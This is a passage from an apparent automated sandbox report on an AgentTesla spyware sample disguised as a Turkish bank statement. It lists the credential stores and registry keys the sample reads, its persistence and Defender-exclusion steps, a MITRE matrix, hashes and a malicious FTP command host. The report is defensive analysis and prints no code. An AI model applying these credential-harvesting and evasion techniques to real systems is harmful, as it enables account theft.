                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 6516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 5300, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xyodEPhulIrkY.exe PID: 2828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xyodEPhulIrkY.exe PID: 1628, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 6516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 5300, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xyodEPhulIrkY.exe PID: 2828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xyodEPhulIrkY.exe PID: 1628, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1463493 Sample: hesaphareketi-.exe Startdate: 27/06/2024 Architecture: WINDOWS Score: 100 46 ftp.normagroup.com.tr 2->46 50 Snort IDS alert for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 12 other signatures 2->56 8 hesaphareketi-.exe 7 2->8         started        12 xyodEPhulIrkY.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\xyodEPhulIrkY.exe, PE32 8->38 dropped 40 C:\...\xyodEPhulIrkY.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpE555.tmp, XML 8->42 dropped 44 C:\Users\user\...\hesaphareketi-.exe.log, ASCII 8->44 dropped 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->58 60 Uses schtasks.exe or at.exe to add and modify task schedules 8->60 62 Adds a directory exclusion to Windows Defender 8->62 14 hesaphareketi-.exe 14 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        64 Antivirus detection for dropped file 12->64 66 Multi AV Scanner detection for dropped file 12->66 68 Machine Learning detection for dropped file 12->68 24 xyodEPhulIrkY.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 48 ftp.normagroup.com.tr 104.247.165.99, 21, 49705, 49706 ASN-QUADRANET-GLOBALUS United States 14->48 70 Installs a global keyboard hook 14->70 72 Loading BitLocker PowerShell Module 18->72 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->74 76 Tries to steal Mail credentials (via file / registry access) 24->76 78 Tries to harvest and steal ftp login credentials 24->78 80 Tries to harvest and steal browser information (history, passwords, etc) 24->80 36 conhost.exe 26->36         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    hesaphareketi-.exe53%ReversingLabsWin32.Trojan.Generic
                    hesaphareketi-.exe100%AviraHEUR/AGEN.1363658
                    hesaphareketi-.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe100%AviraHEUR/AGEN.1363658
                    C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe53%ReversingLabsWin32.Trojan.Generic

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ftp.normagroup.com.tr100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ftp.normagroup.com.tr
                    		104.247.165.99
                    		truetrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://ftp.normagroup.com.trhesaphareketi-.exe, 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4492018819.000000000305C000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002D0C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://account.dyn.com/hesaphareketi-.exe, 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehesaphareketi-.exe, 00000000.00000002.2067164468.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-.exe, 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 00000009.00000002.2098714484.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, xyodEPhulIrkY.exe, 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      104.247.165.99
                      		ftp.normagroup.com.trUnited States
                      		8100ASN-QUADRANET-GLOBALUStrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1463493
                      Start date and time:2024-06-27 09:15:49 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 10m 4s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:17
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:hesaphareketi-.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@19/15@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 155
                      • Number of non-executed functions: 5
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: hesaphareketi-.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      03:16:39API Interceptor8430720x Sleep call for process: hesaphareketi-.exe modified
                      03:16:41API Interceptor41x Sleep call for process: powershell.exe modified
                      03:16:44API Interceptor6140427x Sleep call for process: xyodEPhulIrkY.exe modified
                      09:16:41Task SchedulerRun new task: xyodEPhulIrkY path: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      104.247.165.99hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                        19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse
                          CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exeGet hashmaliciousAgentTeslaBrowse
                            hesaphareketi-14-06-2024.exeGet hashmaliciousAgentTeslaBrowse
                              hesaphareketi01.exeGet hashmaliciousAgentTeslaBrowse
                                hesaphareketi01--.exeGet hashmaliciousAgentTeslaBrowse
                                  hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                    hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                      hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                        hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ftp.normagroup.com.trhesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-14-06-2024.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi01.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi01--.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-01.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ASN-QUADRANET-GLOBALUShesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          RFQ678903423_PROD_HASUE_de_Mexico_ExportS.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                                          • 64.188.26.202
                                          BNP DOC 12578945329763-7633562829.exeGet hashmaliciousRemcosBrowse
                                          • 104.223.119.206
                                          19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.247.165.99
                                          SWU5109523I.exeGet hashmaliciousFormBook, LokibotBrowse
                                          • 104.129.27.23
                                          BL-RTM1439068.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                          • 64.188.16.157
                                          Hecker Glastechnik - Bestellung #009449 PDF.wsfGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 45.66.217.104
                                          AWB Shipping Docs No-285380XXX.exeGet hashmaliciousRemcosBrowse
                                          • 104.223.119.206
                                          UNCR76301078976375.wsfGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 45.66.217.104
                                          https://www.optimum.net/api/login/services/v1/signout2?referer=https://docsend.com/view/gnabnfu5rchh7amzGet hashmaliciousPhisherBrowse
                                          • 216.144.225.86

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\hesaphareketi-.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1301
                                          Entropy (8bit):5.334025345208678
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                          MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                          SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                          SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                          SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xyodEPhulIrkY.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1301
                                          Entropy (8bit):5.334025345208678
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                          MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                          SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                          SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                          SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.379460230152629
                                          Encrypted:false
                                          SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:fLHyIFKL3IZ2KRH9Ougos
                                          MD5:28F8623974ADE7FF0B49C3406E91E372
                                          SHA1:739F9DD671D9788B182A7A2D506A3919CA1C6098
                                          SHA-256:3CFE86C229FC35A9886CD7D5A46DFF98C0389C9294C35AA82FA4F907A72E8269
                                          SHA-512:93E2DC72E86EE4006A29687F845FA384C4B3DF320191C77E64CF3EF751D641BB51328F5F36F31FF781F07233A4D3BF24DBC57CCE9B943756257D0A1E0912AB32
                                          Malicious:false
                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0cfqgpxz.v1x.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15ye2faw.mpy.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dolm201u.snj.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ov0lmuqm.vxs.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qz3n45m0.2rv.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
